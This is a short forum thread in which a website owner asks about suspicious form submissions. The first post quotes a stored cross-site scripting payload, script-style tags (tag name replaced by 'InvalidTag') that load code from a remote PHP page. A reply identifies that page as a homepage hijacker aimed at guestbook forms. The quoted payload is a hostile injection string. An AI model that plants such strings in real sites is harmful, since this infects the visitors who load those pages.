Suspicious form submissions with scripts
Results 1 to 3 of 3

Thread: Suspicious form submissions with scripts

  1. #1
    Senior Member
    Join Date
    Jan 2002
    Posts
    682

    Suspicious form submissions with scripts

    I have several form submission areas on one of my websites which sends me an email via coldfusion's cfmail tag and I've received several similar to this over the last couple of weeks. My suspicion is that this is a bot submitting nasty code (which is sanitized by my form submission server side code or Blink (or both)

    The code in the email is

    <InvalidTag src=http://nmaq.com/q.php>jonny454</script> jonny914@gmail.com <InvalidTag src=http://nmaq.com/q.php>jonny937</script> <InvalidTag src=http://nmaq.com/q.php>jonny365</script> <InvalidTag src=http://nmaq.com/q.php>jonny368</script>

    anyone seen this before... anyone with a system they don't care about care to pop over to nmaq.com and see what q.php does
    I used to be With IT. But then they changed what IT was. Now what I'm with isn't IT, and what's IT seems scary and weird." - Abe Simpson

  2. #2
    Senior Member alakhiyar's Avatar
    Join Date
    Dec 2006
    Location
    Land of Oryx
    Posts
    255
    Edited to remove the actual email address. I can go to that site, what exactly would you like me to do?
    (\__/)
    (='.'=)
    (")_(")

  3. #3
    Senior Member alakhiyar's Avatar
    Join Date
    Dec 2006
    Location
    Land of Oryx
    Posts
    255
    It's a fairly basic homepage hijacker as far as I can tell. (Nobody trust your system to that 30-second analysis please...)

    I suspect it's a bot hoping for guestbook type forms where it can post the code to your website and other visitors will get it.
    (\__/)
    (='.'=)
    (")_(")

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •